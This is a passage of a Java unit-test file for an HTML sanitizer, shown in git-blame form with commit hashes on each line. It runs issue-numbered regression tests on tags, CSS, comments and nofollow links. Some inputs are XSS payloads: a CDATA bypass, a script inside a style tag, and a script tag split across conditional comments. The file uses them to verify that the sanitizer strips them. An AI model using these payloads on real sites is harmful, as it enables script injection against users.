4220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
424afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<i(\\s*)/>.*");
4260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
4280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<hr(\\s*)/>.*");
4300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
4320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #20 */
4350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />");
4360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />");
4380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #25 */
4410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
4420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<div>Test</div>", sanitize("<div style=\"margin: -5em\">Test</div>"));
4430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #28 */
4464e867904c8295537803c1c8a076e130df5674b58mikesamuel    assertSanitizedDoesContain(
4474e867904c8295537803c1c8a076e130df5674b58mikesamuel        "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">Test</div>",
448b268f8745b09a77af2e8c77ffd376b6459bf4fecmikesamuel        "font-family:&#39;geneva&#39; , &#39;arial&#39; , &#39;courier new&#39; , sans-serif");
4490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #29 - missing quotes around properties with spaces */
4510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
4520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<style type=\"text/css\"><![CDATA[P {\n     font-family: \"Arial Unicode MS\";\n}\n]]></style>";
4530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(s, sanitize(s));
4540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #30 */
4580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
4590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>";
4600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = sanitize(s);
4620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // followup - does the patch fix multiline CSS?
4640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s2 = "<style type=\"text/css\"><![CDATA[\r\nP {\r\n margin-bottom: 0.08in;\r\n}\r\n]]></style>";
4650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<style type=\"text/css\"><![CDATA[P {\n\tmargin-bottom: 0.08in;\n}\n]]></style>", sanitize(s2));
4660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // next followup - does non-CDATA parsing still work?
4680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s3 = "<style>P {\n\tmargin-bottom: 0.08in;\n}\n";
4700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<style>P {\n\tmargin-bottom: 0.08in;\n}\n</style>\n", sanitize(s3));
4710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // for other
4730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // tests
4740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #32 - nekos problem */
4770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<SCRIPT =\">\" SRC=\"\"></SCRIPT>";
4790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
4800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
4810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #37 - OOM */
4840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String dirty = "<a onblur=\"try {parent.deselectBloggerImageGracefully();}" + "catch(e) {}\""
4860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "href=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"><img" + "style=\"FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 150px; CURSOR:"
4870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "hand; HEIGHT: 100px\" alt=\"\"" + "src=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\""
4880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "border=\"0\" /></a><br />Poor Bill, couldn't make it to the Museum's <span" + "class=\"blsp-spelling-corrected\" id=\"SPELLING_ERROR_0\">story time</span>"
4890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "today, he was so busy shoveling! Well, we sure missed you Bill! So since" + "ou were busy moving snow we read books about snow. We found a clue in one"
4900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "book which revealed a snowplow at the end of the story - we wish it had" + "driven to your driveway Bill. We also read a story which shared fourteen"
4910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "<em>Names For Snow. </em>We'll catch up with you next week....wonder which" + "hat Bill will wear?<br />Jane";
4920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sanitize(dirty);
4940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertNotNull(s);
4950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #38 - color problem/color combinations */
4980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<font color=\"#fff\">Test</font>";
5000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String expected = "<font color=\"#fff\">Test</font>";
5010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5044e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<div style=\"color: #fff\">Test 3 letter code</div>";
505c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel      expected = "<div style=\"color:#fff\">Test 3 letter code</div>";
5064e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5074e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<font color=\"red\">Test</font>";
5100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<font color=\"red\">Test</font>";
5110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5144e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<font color=\"neonpink\">Test</font>";
5154e867904c8295537803c1c8a076e130df5674b58mikesamuel      expected = s;
5164e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5174e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
5200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        s = "<font color=\"#0000\">Test</font>";
5210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        expected = "<font>Test</font>";
5220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
5250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
5270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        s = "<div style=\"color: #0000\">Test</div>";
5284e867904c8295537803c1c8a076e130df5674b58mikesamuel        expected = "<div>Test</div>";
5290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
5320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<font color=\"#000000\">Test</font>";
5340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<font color=\"#000000\">Test</font>";
5350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5384e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<div style=\"color: #000000\">Test</div>";
539c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel      expected = "<div style=\"color:#000000\">Test</div>";
5404e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5414e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<b><u>foo<style><script>alert(1)</script></style>@import 'x';</u>bar";
5440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
5450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
5460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #40 - handling <style> media attributes right */
5480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
5500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain("<style media=\"print, projection, screen\"> P { margin: 1em; }</style>", "print, projection, screen");
5510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
5520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #41 - comment handling */
5540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
5560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("text ", sanitize("text <!-- comment -->"));
5570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("text ", sanitize("text <!-- comment -->"));
5580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>"));
5610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>"));
5620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>"));
5640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>"));
5650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * Check to see how nested conditional comments are handled. This is
5680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * not very clean but the main goal is to avoid any tags. Not sure
5690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * on encodings allowed in comments.
5700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>";
5720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String expected = "<div>text &lt;[endif]--&gt;</div>";
5730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String output = sanitize(input);
5740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, output);
5750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>";
5770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<div>text &lt;[endif]--&gt;</div>";
5780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      output = sanitize(input);
5790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, output);
5800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * Regular comment nested inside conditional comment. Test makes
5830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * sure
5840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment &lt;[endif]--&gt;</div>", sanitize("<div>text <!--[if IE]> <!-- IE specific --> comment <[endif]--></div>"));
5860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * These play with whitespace and have invalid comment syntax.
5890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- [ if lte 6 ]>\ncomment <[ endif\n]--></div>"));
5910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment </div>", sanitize("<div>text <![if !IE]> comment <![endif]></div>"));
5920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment </div>", sanitize("<div>text <![ if !IE]> comment <![endif]></div>"));
5930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String attack = "[if lte 8]<script>";
5950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String spacer = "<![if IE]>";
5960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      StringBuffer sb = new StringBuffer();
5980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sb.append("<div>text<!");
6000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      for (int i = 0; i < attack.length(); i++) {
6020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sb.append(attack.charAt(i));
6030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sb.append(spacer);
6040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
6050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sb.append("<![endif]>");
6070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sb.toString();
6090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "<script");
6110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "<script");
6120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /*
6150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * issue #44 - childless nodes of non-allowed elements won't cause an error
6160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
6170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<iframe src='http://foo.com/'></iframe>" + "<script src=''></script>" + "<link href='/foo.css'>";
6190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(s, "", sanitize(s));
6200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #51 - offsite urls with () are found to be invalid */
6230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain(
6240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href='http://subdomain.domain/(S(ke0lpq54bw0fvp53a10e1a45))/MyPage.aspx'>test</a>", "(");
6250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #56 - unnecessary spaces */
6274e867904c8295537803c1c8a076e130df5674b58mikesamuel    {
6280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<SPAN style='font-weight: bold;'>Hello World!</SPAN>";
6294e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(
630c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel          "<span style=\"font-weight:bold\">Hello World!</span>",
6314e867904c8295537803c1c8a076e130df5674b58mikesamuel          sanitize(s));
6320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #58 - input not in list of allowed-to-be-empty tags */
6350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "tgdan <input/> g  h";
6370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("tgdan  g  h", sanitize(s));
6380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #61 - input has newline appended if ends with an accepted tag */
6420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String dirtyInput = "blah <b>blah</b>.";
6440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sanitize(dirtyInput);
6450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(dirtyInput, s);
6460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #69 - char attribute should allow single char or entity ref */
6490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6504e867904c8295537803c1c8a076e130df5674b58mikesamuel    {
6510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<td char='.'>test</td>";
6520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='..'>test</td>";
6560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;'>test</td>";
6600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;a'>test</td>";
6640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;&amp;'>test</td>";
6680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* privately disclosed issue - cdata bypass */
6730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String malInput = "<![CDATA[]><script>alert(1)</script>]]>";
6750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(malInput, "<script");
6770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* this test is for confirming literal-lists work as
6800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * advertised. it turned out to be an invalid / non-
6810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * reproducible bug report but the test seemed useful
6820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * enough to keep.
6830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
6840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String malInput = "hello<p align='invalid'>world</p>";
6860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(malInput, "invalid");
6870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String goodInput = "hello<p align='left'>world</p>";
6890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
6900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertSanitizedDoesContain(goodInput, "left");
6910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
6920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
6940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
6960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Tests cases dealing with nofollowAnchors directive. Assumes anchor tags
6970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * have an action set to "validate" (may be implicit) in the policy file.
6980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
6990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testNofollowAnchors() throws Exception {
7000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // adds when not present
7010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // adds properly even with bad attr
7040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" bad=\"true\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // rel with bad value gets corrected
7070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"blh\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // correct attribute doesnt get messed with
7100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // if two correct attributes, only one remaining after scan
7130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"nofollow\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // test if value is off - does it add?
7160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("a href=\"blah\">link</a>", "nofollow");
7170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testValidateParamAsEmbed() throws Exception {
7200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // let's start with a YouTube embed
7210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>";
7230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
